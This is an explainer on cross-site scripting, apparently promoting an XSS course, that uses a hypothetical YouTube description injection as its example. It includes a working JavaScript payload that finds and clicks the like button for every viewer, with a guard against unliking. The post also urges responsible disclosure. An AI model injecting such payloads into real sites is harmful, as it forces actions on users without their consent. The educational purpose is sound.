Cross-Site Scripting, or XSS, lets attackers inject their own script into a web page so that it runs in the browser of everyone who views that page.
On a desktop or laptop you can run code inside a page right now: open the console in your browser's dev tools and call the alert() function.
If you're on a phone: no console for you.
Think about it like this: if you were using a public computer, say, at a library, and someone forgot to sign out of their YouTube account, what's the worst you could do?
Now let's suppose that video descriptions on YouTube had an XSS vulnerability. What would this mean?
Let's attack that description.
As a result, every time somebody views the video, the script would run automatically in their browser and do whatever the attacker wanted: ask for your password, post a hilarious comment, or, as I'm showing you today, SMASH that like button.
<script>//and some code</script>
All you need is code; code is all you need.
Most of the time security researchers demonstrate XSS by opening an alert box in the browser like this.
After all they can't just go around exploiting users every time they find a vulnerability. You know, because of rules and morals and... prison.
But here's the problem: most engineering teams get “alert fatigue” and become desensitized to XSS because they've never seen the full impact that it can have. As a result, they can't fully grasp just how dangerous and damaging XSS attacks can be. That is, unless they've already been hacked.
If you right-click the like button on a YouTube video and select the inspect option you'll see the HTML code used to create that exact button.
You'll also see that the button has an attribute called aria-label set equal to the words "like this video" and so on.
Protip: to avoid self-XSS, don't get into the habit of pasting random, sketchy code into your console.
button = document.querySelector('button[aria-label^="like"]')
Reading that left to right: give me the first button you find with an aria-label attribute starting with "like", and let's name it button.
Now remember, this is important, YouTubers don't click, so let's type:
button.smash = button.click
Now all that's left is to SMASH that like button with:
It's really that easy.
If an attacker can inject script into YouTube this is all the code that script would need to force users to automatically like the video:
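Here is that payload written out as a complete, added example (my code, not the original post's snippet and not anything from YouTube). It assumes the like button is a button whose aria-label starts with "like", and it also assumes the button reports its toggle state through an aria-pressed attribute, which matters because clicking a like button that is already pressed would UNLIKE the video. The fake button and fake document at the bottom are constructed stand-ins so the example runs in plain Node with no browser; in a real page you pass document instead.

```javascript
// Find the like button under `root` (document, or any object with querySelector).
// Attribute selectors are case-sensitive by default; the trailing " i" flag makes the
// prefix match case-insensitive, so "Like this video" is matched as well as "like ...".
function findLikeButton(root) {
  return root.querySelector('button[aria-label^="like" i]');
}

// Press the like button exactly once. Returns a status string so a caller (or a test)
// can see what happened instead of relying on a visible side effect in the page.
function smashLikeButton(root) {
  const button = findLikeButton(root);
  if (!button) return "not-found"; // markup changed, or the page has not finished loading
  // ASSUMPTION: the button exposes its toggle state as aria-pressed="true"/"false".
  // Clicking a pressed like button would toggle it back off, so bail out here.
  if (button.getAttribute("aria-pressed") === "true") return "already-liked";
  button.smash = button.click; // YouTubers don't click, they smash
  button.smash();
  return "smashed";
}

// Constructed stand-in for a like button (not YouTube markup) so the example runs in Node.
function fakeLikeButton(label, pressed) {
  const attrs = { "aria-label": label, "aria-pressed": String(pressed) };
  return {
    clicks: 0,
    getAttribute(name) { return name in attrs ? attrs[name] : null; },
    click() { this.clicks += 1; attrs["aria-pressed"] = "true"; },
  };
}

// Constructed stand-in for document.querySelector; it understands only the
// button[aria-label^="<prefix>"] form used above, with an optional " i" flag.
function fakeRoot(buttons) {
  return {
    querySelector(selector) {
      const m = /^button\[aria-label\^="([^"]*)"( i)?\]$/.exec(selector);
      if (!m) throw new Error("unsupported selector in this stand-in: " + selector);
      const fold = (s) => (m[2] ? s.toLowerCase() : s);
      return buttons.find((b) => fold(b.getAttribute("aria-label") || "").startsWith(fold(m[1]))) || null;
    },
  };
}

// In a real browser (e.g. script injected into the description) run it against the DOM;
// in Node there is no document, so this line does nothing.
if (typeof document !== "undefined") smashLikeButton(document);
```

Two things to notice: querySelector returns null when nothing matches, so an injected payload that skips the check throws and does nothing; and the aria-pressed guard is what separates "force a like" from "flip the like state", which is the difference between a working payload and one that quietly unlikes the video for every viewer who already liked it.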
Obviously there's much worse that can be done here if you did find an XSS vulnerability in YouTube. That said, I would suggest working responsibly with Google and they'll pay you lots of money through their reward program instead of trying to exploit users and going to prison.
Video: Hacking Websites With Cross-Site Scripting
The Ultimate XSS Training Course gives you the full, uncensored picture of Cross-Site Scripting from the perspectives of criminal hackers and the engineers whose job it is to stop them.
Cross-Site Scripting (XSS) is the #1 most common appsec vulnerability that allows attackers to steal private data, hijack accounts and spread ransomware on your sites. This course teaches students to:
Discover critical XSS vulnerabilities in web applications.
Create, analyze and stop malicious exploits used by criminal hackers.
Fix XSS vulnerabilities in routine and emergency situations.
Stop costly vulnerabilities before they reach production using the latest best practices and techniques.